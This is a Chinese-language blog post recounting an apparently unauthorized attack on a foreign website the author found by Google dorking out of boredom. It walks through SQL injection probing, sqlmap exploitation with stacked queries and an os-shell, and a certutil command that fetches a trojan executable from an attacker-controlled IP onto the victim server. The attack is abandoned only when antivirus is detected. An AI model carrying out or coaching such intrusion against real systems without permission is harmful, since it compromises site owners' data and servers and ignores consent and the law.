0x00:尋找漏洞點

某天閑著無聊用谷歌語法inurl:aspx?id=找到一個國外的某個站點。功能點比較簡單只有一個User ID:

0x01:檢測功能點

由于只有搜索框我們先來一個單引號看他是否報錯報。

我們發現報錯了單引號，我們再來一個單引號測試一下看看能不能回顯,頁面正常。

我們發現隨便輸入點內容網站回顯正常提示xxxx。說明有可能存在sql注入，我們繼續往下看。

0x02:信息收集

這里利用火狐瀏覽器的WAppalyzer插件看了一下網站信息。IIS版本為7.5有文件上傳IIS解析漏洞。

下面是用在線網站探查到的端口情況,還開一個1433端口。

0x03:Burp抓包+sqlmap檢測

既然剛才前面的輸入框會引起報錯有可能存在sql注入那我是否可以考慮抓個數據包放到sqlmap里面跑跑看能不能跑出一些關鍵信息。下面利用Burp抓到包然后保存為x.txt。這里們加*號就是指定注入點。

放到sqlmap里面,已經提示可以注入。

我們繼續往下看,下面是注入點。

有堆疊注入我們看看堆疊可以直接sqlmap --is-dba 看看是不是管理員權限如果我們可以利用sqlmap –-os-shelll 直接寫入木馬 拿到webshell或者反彈shell直接

這里看到dba的權限為True代表有機會寫入一句話從而獲取到也給低權限的shell。

這里可以直接sqlmap –os-shell,當出現os-shell的時候代表成功。

我們輸入一條ipconfig簡單命令看看能不能執行成功。然后判斷目標是否出網！如果不出網那傳木馬上去就扯犢子了，可以選擇傳webshell。

我們可以看到命令可以執行

接下可以使用certutil.exe去接收一個惡意的文件。

命令certutil.exe -urlcache -split -f http:
//192.168.163.128:8080/artifact.exe c:artifact.exe // c:artifact.exe是保存路徑

這條命令遠程下載文件木馬保存到受害機上去

先查看一下當前的進程。

然后使用在線的殺毒識別。結果發現還真有防護，就此放棄。。。。。。